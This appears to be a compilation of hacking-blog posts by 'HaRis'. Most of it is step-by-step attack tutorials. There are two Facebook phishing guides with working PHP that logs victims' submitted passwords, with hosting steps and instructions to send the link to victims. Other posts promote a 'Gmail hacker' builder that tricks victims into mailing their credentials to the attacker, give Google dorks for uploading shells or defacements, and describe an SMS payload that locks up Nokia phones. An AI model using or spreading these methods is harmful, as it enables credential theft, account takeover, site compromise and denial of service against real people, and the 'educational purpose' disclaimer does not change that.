How to hack Facebook with phishing page 2014 new methed

        How to hack Facebook with phishing page

                                                                                                      by:HARIS KhaN

                                                         

                                                            

As we all want to hack our friend facebook account,and want to read all his personal things.

Today i m gonna teach you how to hack a facebook account with a phishing page.

phishing:

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING....

                                                                         

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

                                          

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.

3.Now open the notepad and press CTRL+F,and type ACTION.

                                                  

                                           

4.You will have to find a text which looks like ..

                                       action="https://www.facebook.com/login.php?login_attempt=1"

5.delete all the text written in red colour and instead of it write post.php.then it will look like...

                                                 action="post.php"

6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .

index

                                                   
8.Open a new notepad and save the given data with the name post.php.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?> 

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
                           

                                              

12.You have to make a account in that ,after that it looks like a picture given below.

                                                                          
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.

                                           
                                        

15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

                                        
16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

                                         

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.
                                

                                        

19.Click on view now u will have your friend's password and email id.

                                           

20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.


       click here to view a video tutorial with the readymade phishing pages....

note:

phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....

                                               

Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....

                                                           thank you....
            

BY HaRis

How to Hack Gmail Password With Gmail Hacker

Hack Gmail Password With Gmail Hacker

Previously i have posted alot of articles on Gmail hacking. Recently the number of users Gmail users have increased, therefore Gmail have been the major target of lots of hackers.People use Gmail as a primary email and therefore if hackers can gain access to their primary email accounts so therefore they can also hack other accounts associated witth your Gmail account.

While browsing on the internet I came across a piece of tool that can help hackers with good social engineering skills hack gmail passwords easily, the tool itself is extremely simple to configure and very user friendly. The gmail hacking software is so easy to use, all you need to do is to download the gmail hacking software from the link mentioned below, build your server and send the server to the victim.

Gmail Hacker - Hack Gmail Passwords

Here is how a hacker can use Gmail hacker to hack gmail passwords:

Requirements:

• Download .Net Framework
• Gmail hacker
• Winrar (In order to extract the files) 

Step 1 - Extract the archive named gmail.rar on your computer, Once you have extracted you will see the following files:

Step 2 - On opening Gmail hacker builder.exe you will see the following:

Step 3 - Next you need to enter your gmail address where you would receive logs. However I would recommend you to create a fake email address and use it for receiving logs. 

Step 4 - Once you have entered your credentials, click on the build button. 

Step 5 - A file named gmailhacker.exe would be created, On executing the file, the victim will see the following:

Now you need to apply your social engineering skills in order to make the victim enter his/her credentials on to the software. The simplest way of accomplishing this is to tell the victim that the application Gmailhacker.exe is itself a gmail hacking software, You just need to the victim's username, your own gmail ID and your own gmail password, where you would receive victims passwords and click "Hack Them".

Step 6 - Once the victim clicks on the "Hack Them" button, his own gmail credentials that he entered would be sent to you on the email you typed while configuring the software. 

Well, here is an interesting part, when the victim will click on the button "Hack them", he will receive the following error, making him thinking that their is a problem with the software:

______________________________________________________________BY HaRis

how we track wifi hacker

How to Track wi-fi Hackers?

Got a Wi-Fi net connection ? And do you think it is secure enough ? With the onset of cyber crimes taking place,your Wi-fi may be used illegally by hackers or some other people.Either you may get high internet bills in reward or you may be on headlines as your net may be compromised to send malicious emails to anyone,that's what happened in India sometime ago in Mumbai Bomb blast case. Well,there comes MoocherHunter™ to rescue.
MoocherHunter™ is a mobile tracking software tool for the real-time on-the-fly geo-location of wireless moochers and hackers. If you have ever wondered about the possibility of your wireless network getting used for illegal purposes, you must consider using Moocher Hunter. Using Moocher Hunter you can identify the location of the person i.e. an unauthorized user using your wireless network. Its then upto you to either give him a stern warning of not using your wireless network again or complaining to the legal authorities.
Recently Indian Police and RAW (Research and Analysis Wing) used Moocher Hunter to track the source of email which was sent from an unsecured Wi-Fi network from the home of an American expatriate,whose Network was compromised as someone wardived to use his net connection and send an email that took responsibility for a bomb blast that killed at least 42 people.
MoocherHunter is FREE to use and can easily predict the physical location of the computer using the WiFi connection.
The algorithms applied use various signal variables to accurately predict the position of the connected laptop/machine and allows to identify the location of an 802.11-based wireless moocher or hacker by the traffic they send across the network.MoocherHunter™ allows to pinpoint the location of a WIFI hacker upto an accuracy of 2 meters within an average of 30 minutes.
Moocherhunter is the ultimate Wifi hacker tracker tool and its a must for every Network security specialist,White hats,Black hats,Green and Grey hats out there.

Download MoocherHunter™

Keep Learning..BY HaRis

how to see Java script to see passwords!

Java script to see passwords!

Heya friends this an old thing but still im posting it.

You see password in '' *********** '' form and want to decrypt it into it's original form, to do that all you have to do is just copy and paste this script in your url box.

javascript: alert(document.getElementById('Passwd').value);

As you can see the image here, the password i typed was ''yoyo!'' and then i pasted the script in url box(address bar) and pressed enter, so the password showed up!

p.s.- use INTERNET EXPLORER ONLY for this script !

How we find a Vulnerable Website?

How to find a Vulnerable Website?

Website Security is a major problem today and should be a priority in any organization or a webmaster, Now a days Hackers are concentrating alot of their efforts to find holes in a web application, If you are a website owner and having a High Page rank and High Traffic then there is a chance that you might be a victim of these Hackers.
Few years back their existed no proper tools search for vulnerability, but now a days there are tons of tools available through which even a newbie can find a vulnerable site and start Hacking

 Common Methods used for Website Hacking

There are lots of methods that can be used to hack a website but most common ones are as follows:


1.SQL Injection
2.XSS(Cross Site Scripting)
3.Remote File Inclusion(RFI)
4.Directory Traversal attack
5.Local File inclusion(LFI)
6.DDOS attack

I have explained some of these methods in my post "Common methods to hack a website"

Tools commonly used to find a vulnerable website

Acunetix

Acunetix is one of my favorite tool to find a venerability in any web application It automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

Download Acunetix Web Security Scanner

Nessus

Nessus is the best unix venerability testing tool and among the best to run on windows. Key features of this software include Remote and local file securitychecks a client/server architecture with a GTK graphical interface etc.

Download Nessus from the link below
http://www.nessus.org/download

Retina-

Retina is another Vulnerability Assessment tool,It scans all the hosts on a network and report on any vulnerabilities found.

Download Retina from the link below
http://www.eeye.com/downloads

Metasploit Framework

The Metasploit Framework is the open source penetration testing framework with the world's largest database of public and tested exploits.

Download Metasploit from the link below :
http://www.metasploit.com/download/BY HaRis

How to Hack Nokia Phones

How to Hack Nokia Phones – Using SMS

Yep, One can hack Nokia phones by just sending a SMS,seems devilish isn't it? Although this vulnerability was found more than an year ago, I recently tried it and found it working in many sets. The vulnerability dubbed as “Curse of Silence” affects all Nokia Symbian 60/Series 60 devices and allows for remote SMS/MMS Denial of Service.One can send a specially crafted sms to lockup/crash any Series 60 device.

What is Required ?

• MSISDN of the target.
• A Mobile phone service provider which allows sending of SMS messages (Airtel in my case)
• (Almost) any Nokia phone (or some other means of sending SMS messages with TP-PID set to "Internet Electronic Mail" )

Risk Levels
Although the vulnerability is spread across many versions of S60 platform,the Risk level is quite high for (for S60 2.6 and 3.0 devices)as upon attack,the target will not be able to receive any SMS or MMS messages until the device is Factory Resetted and Medium for S60 2.8 and 3.1 devices as upon Ddos attack,the target will not be able to receive any SMS or MMS messages while the attack is ongoing. After that, only very limited message receiving is possible until the device is Factory Resetted.
 
The Attack
One can send an email using an sms by setting the messages Protocol Identifier to "Internet Electronic Mail" and formatting the message like this:

<email-address><space><message body>
The simplest attack will be -
123456789@123456789.1234567890123

If such messages contain an <email-address> with more than 32 characters, S60 2.6, 2.8, 3.0 and 3.1 devices fail to display the message or give any indication on the user interface that such a message has been received. They do,however, signal to the SMS Career that they have received the message.
Devices running S60 2.6 or 3.0 will not be able to receive any other SMS message after that. The user interface does not give any indication of this situation. The only action to remedy this situation seems to be a Factory Reset of the device (by entering "*#7370#" ) or using a Vulcan Death Grip.
 
Devices running S60 2.8 or 3.1 react a little different: They do not lock up until they received at least 11 SMS-email messages with an email address that is longer than 32 characters after that the device will not be able to receive any other SMS message and the phone will just display a warning that there is not enough memory to receive further messages and that data should be deleted first. This message is even displayed on an otherwise completely "empty" device. 
After switching the phone off and on again, it has limited capability for receiving SMS messages again: If it receives a SMS message that is split up into several parts it is only able to receive the first part and will display the "not enough memory" warning again. After powercycling the device again, it can then receive the second part. If there is a third part, it has to be powercycled again, and so on.
Also, an attacker now just needs to send one more "Curse Of Silence" message to lock the phone up again. By always sending yet another one as soon as the status report for delivery of the previous message is received, the attacker could completely prevent a target from receiving any other SMS/MMS messages.
Only Factory Resetting the device will restore its full message receiving capabilities. Note that, if a backup is made using Nokia PC-Suite *after* being attacked, the blocking messages are also backuped and will be sent to the device again when restoring the backup after the Factory Reset.

Detailed List of affected phones
Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable component is a S60 base functionality, it seems safe to assume that all devices with these OS versions are affected. I short if you own one of these,you are rounded unless u have a firmware upgrade/fix release by Nokia which fixes this attack.

S60 3rd Edition, Feature Pack 1 (S60 3.1)

• Nokia E90 Communicator
• Nokia E71
• Nokia E66
• Nokia E51
• Nokia N95 8GB
• Nokia N95
• Nokia N82
• Nokia N81 8GB
• Nokia N81
• Nokia N76
• Nokia 6290
• Nokia 6124 classic
• Nokia 6121 classic
• Nokia 6120 classic
• Nokia 6110 Navigator
• Nokia 5700 Xpress Music

S60 3rd Edition, initial release (S60 3.0)

• Nokia E70
• Nokia E65
• Nokia E62
• Nokia E61i
• Nokia E61
• Nokia E60
• Nokia E50
• Nokia N93i
• Nokia N93
• Nokia N92
• Nokia N91 8GB
• Nokia N91   
• Nokia N80
• Nokia N77
• Nokia N73
• Nokia N71
• Nokia 5500
• Nokia 3250

S60 2nd Edition, Feature Pack 3 (S60 2.8)

• Nokia N90
• Nokia N72
• Nokia N70

S60 2nd Edition, Feature Pack 2 (S60 2.6)

• Nokia 6682
• Nokia 6681
• Nokia 6680
• Nokia 6630

Credits
Tobias Engel – The Original Vulnerability Founder
Tested and implemented on Airtel carrier using Nokia 3120 classic and N70/N73/E51 by XERO

Posted by XERO . ALL RIGHTS RESERVED.SourceBY HaRis

Start Backtrack 5 Without "Startx" [AUTOLOGIN]

How to Start Backtrack 5 Without "Startx" [AUTOLOGIN]

Here in this article we learn how to bypass the login id ,password and startx which usually you enter to start Backtrack .

" LETS START "

First you have to install this software package called  " rungetty ". See the image how to install it.

Now next step is to open a tty1.conf file on vim editor.

Your terminal look like this when you open tty1.conf file. 

Now first press i and then do some changes as shown above in the image 

After editing save your file by pressing Esc key and :wq and press enter key. 

Now you have to create a new file named ~/.bash_profile . To create this file you have to use touch command as shown above in the image.

In this step type  ls /root/./bash_profile  to see your file exists or not in root. 
           Yes , your file is exist there as shown in the image.

Now open your  file which you created in  earlier step using vim editor as shown in the image.

Press i to insert text and type startx  and save it by pressing Esc key  , : wq and press Enter.

After all configuration give the reboot command to your system and see what happen next. 

Here it is when you reboot your system it will not ask you to enter login id ,password and startx again . This small utility known as "rungetty" help you to bypass all this .

Now upgrade your BACKTRACK 5 to this method and be different from others.

BY HaRis

Android Codes / Tricks

Android is becoming a very popular these days and all big companies have launched android phones.Android is giving a strong competition to Iphones, symbian phones(like nokia).Though people have a lot of expectations from lumina series by nokia,but i don't think it will be able to compete with android phones!
So here are some tricks and codes which can be useful if you have an android phone!

• Cell Battery, WiFi Usage etc Info *#*#4636#*#*
• Restore Factory Settings *#*#7780#*#*
• Format Phone *2767*3855#
• Launch service mode *#*#197328640#*#*
• Test WiFi *#*#232339#*#* or *#*#526#*#* or *#*#528#*#*
• Display WiFi MAC address *#*#232338#*#*
• GPS test *#*#1472365#*#*
• Other GPS test *#*#1575#*#*
• Bluetooth test *#*#232331#*#*
• Display Bluetooth physic address *#*#232337#*#
• Start Gtalk monitoring *#*#8255#*#*
• PDA, Phone, H/W, RFCallDate *#*#4986*2650468#*#*
• PDA and Phone *#*#1234#*#*
• FTA SW version *#*#1111#*#*
• FTA HW version *#*#2222#*#*
• PDA, Phone, csc, *#*#44336#*#*
• Packet Loopback *#*#0283#*#*
• LCD test *#*#0*#*#*
• Melody test *#*#0673#*#* or *#*#0289#*#*
• Device test such as vibration and lightness *#*#0842#*#*
• Display touchscreen version *#*#2663#*#*
• Touchscreen test *#*#2664#*#*
• Distance sensor test *#*#0588#*#*
• Display memory version *#*#3264#*#*
  
  Like our facebook Page How to hack facebook page

BY HaRis

Hacking

What is Hacking?

Hacking is nothing but 'acting smart'.Most of the times it is considered as something 'illegal' and 'offensive' but all these are misconception.Hacking is making the best use of your brain and innovation to discover/understand things.Hacking can be used for both good as well as bad purposes.

There are 5 types of Hackers -

1.Script kiddies-these are people(most of the times children/youth) who learn according to the situation from the internet and try the learned things out.

2. Black hat hacker-These are people who have gained perfection in almost every art of hacking but they use their skills for negative work and against government.

3.White hat hacker-These hackers have equal knowledge as that of black hats,but they use their knowledge for good purpose. 

4.Grey hat hackers -They are the hackers which are intermediate between black hat and white hat.They have equal knowledge but the sometimes use it for good work and sometimes for bad work.

5.  worker-These are not hackers really,but they are the people who have information about one particular subject in which they are perfect and they can use that information for the bad of their company or against a person. BY HaRis

How we Deface , shell & image upload vulnerability

Deface, Shell & Image Upload Vulnerability

This vulnerability can be used to upload your deface,shell or image on a website.

Google Dorks:inurl:”default_image.asp”
inurl:”default_imagen.asp”
inurl:”/box_image.htm”

 You will get tons of website there. Select any website of your choice, you will get a upload option. Choose your deface, shell or image and click on upload. After the uploading process completes. In the box where all uploaded files are listed, search for the name of your uploaded file. Click on select, under the box you will get the URL of your uploaded file. Add it after the URL of the website (Remember to remove the extra stuff in the URL)

BY HaRis

how we create facebook fake login page "Phishing Tutorial"

How to create facebook fake login page "Phishing Tutorial"

Download Required File through Downloader (Fast Instalation)

Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.


well, here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim

2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files




Step 1. Creating a login.php file>
Open notepad and  paste the following lines there... as save it with name login.php




header ('Location: https://www.facebook.com/login.php');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....

check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)

2.2. Now open the htm file with notepad(right click> open with> notepad)...

and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact  type of line as shown in screen shot.... near which you will find a
 tag and method="post" something like that.

2.3. Now replace the url written after action with the name of your php file created in step 1.

Now your fake page is ready....
Save it with name index.html


Step 3: Uploading on a Free Hosting Site:


Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading onhttp://www.yourfreehosting.net/.
1.  first of all sign up for a free hosting Account.


Note: yourfreehosting.net  is now not available for free, you can create account on 
http://www.000webhost.com/525589.html
2. After creating Account, login there, then go to control pannel> File Manager.

3. Now remove the preexisting index.html file.
4. Now click on upload files and then upload there index.html and login.php

5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"

6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.

Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and  their password will be saved in that file.

BY HaRis